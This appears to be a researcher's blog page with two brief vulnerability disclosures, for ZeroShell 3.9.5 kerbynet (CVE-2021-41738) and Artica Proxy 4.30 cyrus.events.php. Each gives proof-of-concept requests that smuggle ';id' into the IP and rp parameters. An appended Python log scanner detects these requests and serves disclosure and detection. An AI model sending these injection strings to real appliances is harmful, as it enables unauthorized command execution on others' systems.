CVE-2021-41738: rootless – Medium
ZeroShell 3.9.5 has a command injection vulnerability in /cgi-bin/kerbynet IP parameter, which may allow an authenticated attacker to execute system commands.
Sep 26, 2021
Artica Proxy 4.30 cyrus.events.php RCE
Vendor && Product
www.articatech.com
Artica Web Proxy v4.30.000000
Download: http://www.articatech.com/download.php
Reproduction
Log in to the web account and use this PoC.
Because the execution result is not echoed, we view the result by writing it to a file:
https://192.168.108.14:9000/cyrus.events.php?logs=
POST:
rp=;id>…/1.txt;
Access https://192.168.108.14:9000/1.txt to see the execution result.
Sep 24, 2021
Zeroshell 3.9.5 Authenticated RCE
The latest version of ZeroShell (3.9.5) has a command injection vulnerability in /cgi-bin/kerbynet: an authenticated attacker can execute OS commands through the IP parameter.
The IP parameter is used in two places:
POC:
/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPARP&IP=;id
/cgi-bin/kerbynet?Section=Router&STk=<your STk>&Action=CheckIPPING&IP=;id&PacketSize=
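A defender's view of both write-ups, as an added example that is not part of either post: a small access-log scanner that flags kerbynet CheckIPARP/CheckIPPING requests whose IP parameter is not actually an IP address, and flags POSTs to cyrus.events.php for body inspection (the log lines, client addresses and STk value below are constructed, not taken from any real host).

```python
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the page or any real host).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Sep/2021:10:00:01 +0000] "GET /cgi-bin/kerbynet?Section=Router&STk=abc&Action=CheckIPARP&IP=10.0.0.1 HTTP/1.1" 200 512
10.0.0.5 - - [24/Sep/2021:10:00:02 +0000] "GET /cgi-bin/kerbynet?Section=Router&STk=abc&Action=CheckIPPING&IP=%3Bid&PacketSize= HTTP/1.1" 200 512
10.0.0.7 - - [26/Sep/2021:11:00:00 +0000] "POST /cyrus.events.php?logs= HTTP/1.1" 200 0
10.0.0.9 - - [26/Sep/2021:11:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048
"""
# Common log format fields we need: client, method, request target.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
# Zeroshell router actions whose IP parameter should only ever hold an address.
KERBYNET_IP_ACTIONS = {"CheckIPARP", "CheckIPPING"}

def is_ip_address(value: str) -> bool:
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return False

def inspect_request(method: str, target: str) -> Optional[str]:
    """Return a finding for a suspicious request target, else None."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if parts.path == "/cgi-bin/kerbynet":
        action = params.get("Action", [""])[0]
        ip = params.get("IP", [""])[0]
        if action in KERBYNET_IP_ACTIONS and not is_ip_address(ip):
            return f"kerbynet {action}: IP parameter is not an address: {ip!r}"
    if parts.path == "/cyrus.events.php" and method == "POST":
        # The injectable rp field travels in the POST body, which access logs do
        # not record, so a log-based check can only flag the endpoint for review.
        return "cyrus.events.php POST: inspect request body for the rp parameter"
    return None

def scan_log(text: str) -> List[Tuple[str, str]]:
    """Return (client, finding) pairs for every suspicious log line."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, method, target = m.groups()
            finding = inspect_request(method, target)
            if finding:
                findings.append((client, finding))
    return findings
```

Run against SAMPLE_LOG it reports the CheckIPPING request carrying ";id" and the cyrus.events.php POST, and stays silent on the legitimate ARP check and the index.php hit.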